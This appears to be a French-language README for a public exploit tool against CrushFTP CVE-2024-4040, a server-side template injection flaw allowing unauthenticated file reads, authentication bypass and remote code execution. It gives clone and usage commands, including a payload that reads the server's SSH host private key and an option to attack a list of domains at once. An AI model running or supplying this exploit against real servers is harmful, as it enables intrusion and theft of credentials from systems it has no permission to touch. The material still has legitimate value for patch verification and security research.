
Exploit pour la vulnérabilité SSTI de CrushFTP (CVE-2024-4040) permettant la lecture de fichiers non authentifiée, le contournement de l'authentification et l'exécution de code à distance sur les serveurs concernés.
Une vulnérabilité d'injection de template côté serveur dans CrushFTP, dans toutes les versions antérieures à 10.7.1 et 11.1.0 sur toutes les plateformes, permet à des attaquants distants non authentifiés de lire des fichiers du système de fichiers en dehors du VFS Sandbox, de contourner l'authentification pour obtenir un accès administratif et d'exécuter du code à distance sur le serveur.
git clone https://github.com/gotr00t0day/CVE-2024-4040.git
cd CVE-2024-4040
pip3 instrall -r requirements.txt
usage: CVE-2024-4040.py [-h] [-t TARGET] [-f FILE] [-d DOMAINS]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
target to scan
-f FILE, --file FILE file to fetch
-d DOMAINS, --domains DOMAINS
file containing list of domains
# MAKE SURE YOU USE THE <INCLUDE> TAG OR ANY OTHER TAG TO EXPLOIT THE TARGET, SOMETIMES YOU DONT NEED ANY TAGS.
# Exploit a target
python3 CVE-2024-4040.py -t http://TARGET:8080 -f "<INCLUDE>ssh_host_rsa_key</INCLUDE>"
# Exploit a list of targets
python3 CVE-2024-4040.py -d ~/list.txt -f %hostname%
Veuillez lire l'ANALYSE ATTACKERKB pour mieux comprendre comment utiliser cet exploit.